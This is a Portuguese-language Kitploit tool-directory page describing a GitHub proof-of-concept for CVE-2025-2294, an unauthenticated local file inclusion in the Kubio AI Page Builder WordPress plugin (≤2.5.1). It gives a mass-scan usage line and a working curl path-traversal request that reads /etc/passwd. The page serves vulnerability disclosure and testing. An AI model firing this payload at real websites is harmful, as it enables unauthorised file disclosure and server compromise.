Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-2294 — PoC Python para CVE-2025-2294, uma Inclusão Local de Arquivo não autenticada no plugin WordPress Kubio AI Page Builder (≤2.5.1), demonstrando divulgação arbitrária de arquivos e potencial execução remota de código. | Kitploit
Ferramentas/GitHubGitHub/0xwhoami35/cve-2025-2294
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesSegurança WebTestes de Penetração
GitHub0xwhoami35/cve-2025-2294

CVE-2025-2294

PoC Python para CVE-2025-2294, uma Inclusão Local de Arquivo não autenticada no plugin WordPress Kubio AI Page Builder (≤2.5.1), demonstrando divulgação arbitrária de arquivos e potencial execução remota de código.

Ver Repositório
há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-2294

🚨 CVE-2025-2294 - Vulnerabilidade de Inclusão de Arquivo Local (LFI) no Kubio AI Page Builder para WordPress 🧱

🔍 Visão Geral

CVE-2025-2294 é uma vulnerabilidade crítica 🔥 de Inclusão de Arquivo Local (LFI) que afeta o plugin Kubio AI Page Builder para WordPress (versões até e incluindo 2.5.1). Esta falha permite que atacantes remotos não autenticados 👾 incluam arquivos arbitrários no servidor através do parâmetro de URL __kubio-site-edit-iframe-classic-template.

A exploração desta vulnerabilidade pode levar à divulgação de arquivos sensíveis 📂, execução remota de código 💥 e comprometimento total do sistema 💀.

👤 Autor

Muhammad Nizar — Pesquisador de Segurança 🔐
GitHub: 0xWhoami35
YouTube: InfoSec Insight ▶️


Sinta-se à vontade para entrar em contato para perguntas ou colaboração! 🤝


📋 Versões Afetadas

  • Plugin Kubio AI Page Builder ≤ 2.5.1 🛠️

🧰 Uso

Execute o script de exploração com uma lista de URLs alvo:

root@kitploit:~
python3 lfi.py -l list.txt

⚠️ Detalhes da Vulnerabilidade

  • Tipo: Inclusão de Arquivo Local (LFI) 🕳️
  • Severidade: Crítica (CVSS 9.8) 🔥
  • Vetor de Ataque: Remoto, não autenticado 🌐
  • Impacto: Confidencialidade, Integridade, Disponibilidade 🔐

🧪 Prova de Conceito (PoC)

root@kitploit:~
curl "https://target-website.com/?__kubio-site-edit-iframe-preview=true&__kubio-site-edit-iframe-classic-template=../../../../../../../etc/passwd"
Baixar ferramenta